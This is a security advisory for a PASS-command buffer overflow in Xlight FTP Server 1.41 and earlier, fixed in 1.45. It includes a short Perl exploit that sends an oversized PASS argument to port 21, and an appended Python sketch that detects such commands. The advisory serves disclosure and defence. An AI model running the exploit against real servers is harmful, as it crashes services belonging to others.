Xlight FTP Server PASS Buffer Overflow

Summary

Xlight FTP server is ‘a powerful ftp server with very small program size’. A buffer overflow vulnerability has been found in the product that allows remote attackers to overflow an internal buffer.

Credit:

SecurITeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable systems:
 * Xlight FTP Server version 1.41 and prior

Immune systems:
 * Xlight FTP Server version 1.45

By sending an overly long PASS command, a remote attacker can overflow a local buffer used in Xlight FTP server.

Vendor status:
‘We would like to inform you that we have released a new version of Xlight ftp server 1.45 which includes a solution for this buffer overflow problem. Thanks for your alert.

Best regards,
Xlight ftp support
support@xlightftpd.com’

Exploit:
#!/usr/bin/perl
#
# Exploit for Xlight FTP server long PASS vulnerability
#
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => "ftp(21)",
                                 );
unless ($remote) { die "cannot connect to ftp daemon on $host" }

$remote->autoflush(1);

print $remote "USER anonymous\r\n";
sleep(1);

$buf = "A"x54; # Min 54, Max 523
print $remote "PASS ".$buf."\r\n";
sleep(1);

close $remote;
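
Detection sketch for servers still running version 1.41 or earlier (an added example, not part of the original advisory and not Xlight code): it scans a client-to-server FTP control stream and flags PASS commands whose argument reaches the 54-byte minimum given in the exploit's comment. The function names and the sample sessions are assumptions constructed for illustration.

```python
import re

# Shortest PASS argument the advisory reports as triggering the overflow.
PASS_ARG_THRESHOLD = 54

# FTP control-channel line: verb, then an optional space and argument.
_CMD = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.DOTALL)


def split_commands(stream: bytes):
    """Yield command lines from a client-to-server control stream.

    CRLF and bare LF are both accepted, and an unterminated tail is
    yielded too: an oversized command is worth flagging even if the
    connection dropped before the line ending arrived.
    """
    for line in stream.split(b"\n"):
        line = line.rstrip(b"\r")
        if line:
            yield line


def find_long_pass(stream: bytes, threshold: int = PASS_ARG_THRESHOLD):
    """Return one finding per PASS command with an argument >= threshold bytes.

    Only the argument length is recorded, never the argument itself,
    so real passwords do not end up in alert logs.
    """
    findings = []
    for index, line in enumerate(split_commands(stream)):
        match = _CMD.match(line)
        if not match or match.group(1).upper() != b"PASS":
            continue  # verbs are case-insensitive, so compare upper-cased
        arg = match.group(2) or b""
        if len(arg) >= threshold:
            findings.append({"command_index": index, "arg_len": len(arg)})
    return findings


# Constructed sample sessions (not captured traffic).
BENIGN = b"USER anonymous\r\nPASS guest@example.com\r\nQUIT\r\n"
SUSPECT = b"USER anonymous\r\npass " + b"A" * 54 + b"\r\n"

if __name__ == "__main__":
    print(find_long_pass(BENIGN))
    print(find_long_pass(SUSPECT))
```

A 54-byte threshold can also match unusually long legitimate passwords, so treat a hit as a lead to check against the server version rather than as proof of an attempt.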

Categories: Windows